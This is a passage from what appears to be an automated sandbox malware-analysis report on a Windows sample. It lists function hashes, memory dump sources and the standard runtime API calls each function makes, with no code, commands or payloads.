                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeLibrary
                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                • Opcode ID: 386324e6f83d0a3d0598b95fc8beab81ad17c79748aedf5d909eb4a866f9b701
                                                                                                                                • Instruction ID: bf29425834eac1f165d377a27e2900a4b1014afbae7a4f138e20208087d07c0d
                                                                                                                                • Opcode Fuzzy Hash: 386324e6f83d0a3d0598b95fc8beab81ad17c79748aedf5d909eb4a866f9b701
                                                                                                                                • Instruction Fuzzy Hash: DA21F372A01211AFCB228B65EC41A5B77589B41768B251230ED26F72A1EB30FE00C7D0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cb7b518e059c1ba9ffd81d39b10cf90c754ea23349697fe9cb2e7b05bbc61c22
                                                                                                                                • Instruction ID: 2ecaf721199c50cd7f5b89199b0ca40151973bc15e25bfda4233d38899854c45
                                                                                                                                • Opcode Fuzzy Hash: cb7b518e059c1ba9ffd81d39b10cf90c754ea23349697fe9cb2e7b05bbc61c22
                                                                                                                                • Instruction Fuzzy Hash: E7B1EE70E04244AFDF11DFA8D841BAE7BB1BF4F308F185668E511BB292C770A945CBA1
                                                                                                                                APIs
                                                                                                                                • GetLastError.KERNEL32(?,?,00E9D2B7,00E95FB7,00E95179), ref: 00E9D2CE
                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E9D2DC
                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E9D2F5
                                                                                                                                • SetLastError.KERNEL32(00000000,00E9D2B7,00E95FB7,00E95179), ref: 00E9D347
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                • Opcode ID: a3b0c8a4510130dd61da5488def6520a0f8434429badb6b93e0f37d491e02198
                                                                                                                                • Instruction ID: 9efa90606e0f5df765f0ec6daa6a0f01152fdd87ab9abbf982833e3f33b5540c
                                                                                                                                • Opcode Fuzzy Hash: a3b0c8a4510130dd61da5488def6520a0f8434429badb6b93e0f37d491e02198
                                                                                                                                • Instruction Fuzzy Hash: 1F014C3310E7255EAF26A7B57CC596726C4EF42779320132AF120B51E0EF114C099281
                                                                                                                                APIs
                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 00E9DCA7
                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00E9DF20
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                • API String ID: 2673424686-393685449
                                                                                                                                • Opcode ID: 6c41419393b1f4bfcddc0356493c0aabe6b500238dbbfd88b74d080fa77cbeba
                                                                                                                                • Instruction ID: 6e2bcab4e7180f491de4121c28ba0fbb2d67e39214570be711c3f9e0151675d3
                                                                                                                                • Opcode Fuzzy Hash: 6c41419393b1f4bfcddc0356493c0aabe6b500238dbbfd88b74d080fa77cbeba
                                                                                                                                • Instruction Fuzzy Hash: 31B19671C08229EFCF29DFA4CC819AEBBB5FF24304B14615AE8117B212D375EA51CB91
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8040FA0D,?,?,00000000,00EAB774,000000FF,?,00E98D16,00E98BFD,?,00E98DB2,00000000), ref: 00E98C8A
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E98C9C
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,00EAB774,000000FF,?,00E98D16,00E98BFD,?,00E98DB2,00000000), ref: 00E98CBE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                • Opcode ID: 52594363fd98d09dd946df783e6dfc0d13e198d60e1e064d80a6d331ae440d6b
                                                                                                                                • Instruction ID: 9c8239c6f1d5390ebc742d8f80835214afa0382491564be1716ad9d748b835e7
                                                                                                                                • Opcode Fuzzy Hash: 52594363fd98d09dd946df783e6dfc0d13e198d60e1e064d80a6d331ae440d6b
                                                                                                                                • Instruction Fuzzy Hash: 0E01A731941625EFCB118B65CD09BAFB7B8FB45B14F000625F811B22E0DBB4A904CA90
                                                                                                                                APIs
                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00E9FCC2
                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00E9FD8B
                                                                                                                                • __freea.LIBCMT ref: 00E9FDF2
                                                                                                                                  • Part of subcall function 00E9E531: RtlAllocateHeap.NTDLL(00000000,00E931E1,00E9186A,?,00E960C1,00E9186C,00E9186A,?,?,?,00E93181,00E931E1,00E9186E,00E9186A,00E9186A,00E9186A), ref: 00E9E563
                                                                                                                                • __freea.LIBCMT ref: 00E9FE05
                                                                                                                                • __freea.LIBCMT ref: 00E9FE12
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1423051803-0
                                                                                                                                • Opcode ID: b9fb3bccc8b294c5a643c823264091e04d62ae2b25fce6bcece1b20ac9ac44b9
                                                                                                                                • Instruction ID: 2a9b6faf475749ac5ae43ff75eff06d34bec0d77de9171ee62d82426c6e58b9c
                                                                                                                                • Opcode Fuzzy Hash: b9fb3bccc8b294c5a643c823264091e04d62ae2b25fce6bcece1b20ac9ac44b9
                                                                                                                                • Instruction Fuzzy Hash: CD51C6B2600206AFDF219F61CC81EBF76A9EF44724B295539FD04F7112EB30CC6086A0
                                                                                                                                APIs
                                                                                                                                • __EH_prolog3.LIBCMT ref: 00E93017
                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00E93022
                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00E93090
                                                                                                                                  • Part of subcall function 00E92EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E92EFC
                                                                                                                                • std::locale::_Setgloballocale.LIBCPMT ref: 00E9303D
                                                                                                                                • _Yarn.LIBCPMT ref: 00E93053
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1088826258-0
                                                                                                                                • Opcode ID: 0acf714741ddf86c94fa597ca2a6f8173581aa50cd5f3eb2a9c8d790eabb2f3c
                                                                                                                                • Instruction ID: 513ede24603fbaad4e1ccd76699f25f6e3dbcd16b455beb18c842266ed6cf045
                                                                                                                                • Opcode Fuzzy Hash: 0acf714741ddf86c94fa597ca2a6f8173581aa50cd5f3eb2a9c8d790eabb2f3c
                                                                                                                                • Instruction Fuzzy Hash: FD015AB6A01620AFCF16EF60988657E77A1FF84340B14550DE91277391CF346A06CB91
                                                                                                                                APIs
                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00EA7F2E,00000000,?,00EB6E10,?,?,?,00EA7E65,00000004,InitializeCriticalSectionEx,00EAE57C,00EAE584), ref: 00EA7E9F
                                                                                                                                • GetLastError.KERNEL32(?,00EA7F2E,00000000,?,00EB6E10,?,?,?,00EA7E65,00000004,InitializeCriticalSectionEx,00EAE57C,00EAE584,00000000,?,00E9E1DC), ref: 00EA7EA9
                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00EA7ED1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                • String ID: api-ms-
                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                • Opcode ID: 3f8e4c4ac540ef23ae25341a0312d14fdb97e08dda851a04f05b6e4ed4d03ecf
                                                                                                                                • Instruction ID: 8a7f0e50f966fd78c631ef518de5937be58f53dbc45b5264827e49e88acecd45
                                                                                                                                • Opcode Fuzzy Hash: 3f8e4c4ac540ef23ae25341a0312d14fdb97e08dda851a04f05b6e4ed4d03ecf
                                                                                                                                • Instruction Fuzzy Hash: 9EE09230284208BAEA205B71DC07B5B7A98DF05B55F105460F94DBC4E2E761BD5086C4
                                                                                                                                APIs
                                                                                                                                • GetConsoleOutputCP.KERNEL32(8040FA0D,00000000,00000000,?), ref: 00EA5690
                                                                                                                                  • Part of subcall function 00E9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E9FDE8,?,00000000,-00000008), ref: 00E9E6A2
                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EA58E2
                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EA5928
                                                                                                                                • GetLastError.KERNEL32 ref: 00EA59CB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                • Opcode ID: 9848a1e42f0b607dae4945566ac2907f340ed37f56f540be333a91a668e2b47c
                                                                                                                                • Instruction ID: 3400d2da2a0f57b846b6714c97df67734d51116493d92c766ed9079b3d6b5cb0
                                                                                                                                • Opcode Fuzzy Hash: 9848a1e42f0b607dae4945566ac2907f340ed37f56f540be333a91a668e2b47c
                                                                                                                                • Instruction Fuzzy Hash: ACD16976D00648DFCF15CFA8D8809AEBBB9EF4A314F28512AE466FB351D630A945CB50
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AdjustPointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                • Opcode ID: fa4d5adf17e878365e03ec024a47c8d179adf307332318bd2705f08a79674d85
                                                                                                                                • Instruction ID: a4193c4969bd942f18ac08773448e4ab056987359c2c56b8b7c91b90468e5c4d
                                                                                                                                • Opcode Fuzzy Hash: fa4d5adf17e878365e03ec024a47c8d179adf307332318bd2705f08a79674d85
                                                                                                                                • Instruction Fuzzy Hash: FA51E27660D625AFDF29AF50DC45BBA73A4EF80314F145029E845BB291D771ED40CB50
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E9FDE8,?,00000000,-00000008), ref: 00E9E6A2
                                                                                                                                • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00EA359B
                                                                                                                                • __dosmaperr.LIBCMT ref: 00EA35A2
                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00EA35DC
                                                                                                                                • __dosmaperr.LIBCMT ref: 00EA35E3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                • Opcode ID: 14ca46d9d01441d2a15b2c3a53cc8df5d596fb5329fd7dbc5e179b13b9e7409e
                                                                                                                                • Instruction ID: 4198d39606ab5f1a53362471d71f8781f988e62704f2eae603f1d5b054d11cbb
                                                                                                                                • Opcode Fuzzy Hash: 14ca46d9d01441d2a15b2c3a53cc8df5d596fb5329fd7dbc5e179b13b9e7409e
                                                                                                                                • Instruction Fuzzy Hash: 8621DA71A00605AFDF209F79984186BBBE8FF493687145529F825BB641D730FF4087D1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 471b84598747a7ad2a38236b0f2edcddca303ecda4389bf7b0012e528c5dabc6
                                                                                                                                • Instruction ID: bcba708fc87d3b950a1e1e1c0d307037d52948fb992e0c4ffca28dacc5c98bcf
                                                                                                                                • Opcode Fuzzy Hash: 471b84598747a7ad2a38236b0f2edcddca303ecda4389bf7b0012e528c5dabc6
                                                                                                                                • Instruction Fuzzy Hash: 7F21C071200205AFEF20AF71CD8196B77A9FF423687146529F869F7261EF31EC4487A1
                                                                                                                                APIs
                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00EA4857
                                                                                                                                  • Part of subcall function 00E9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E9FDE8,?,00000000,-00000008), ref: 00E9E6A2
                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA488F
                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA48AF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 158306478-0
                                                                                                                                • Opcode ID: df15d578b406648f2567c3145b7e9c7522a6bbd1ea6eb37fd386212bdada7749
                                                                                                                                • Instruction ID: 905607cd4cd09493d21fd865c82bd0efd85c38a2806ed7afb1df87a729a43b36
                                                                                                                                • Opcode Fuzzy Hash: df15d578b406648f2567c3145b7e9c7522a6bbd1ea6eb37fd386212bdada7749
                                                                                                                                • Instruction Fuzzy Hash: 8B1166F15022647F6B1967B6AC8FCBF799CCECA3983102420F901F5241FAA8EE008270
                                                                                                                                APIs
                                                                                                                                • __EH_prolog3.LIBCMT ref: 00E94582
                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00E9458C
                                                                                                                                  • Part of subcall function 00E924C2: std::_Lockit::_Lockit.LIBCPMT ref: 00E924DE
                                                                                                                                  • Part of subcall function 00E924C2: std::_Lockit::~_Lockit.LIBCPMT ref: 00E924F7
                                                                                                                                • codecvt.LIBCPMT ref: 00E945C6
                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00E945FD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
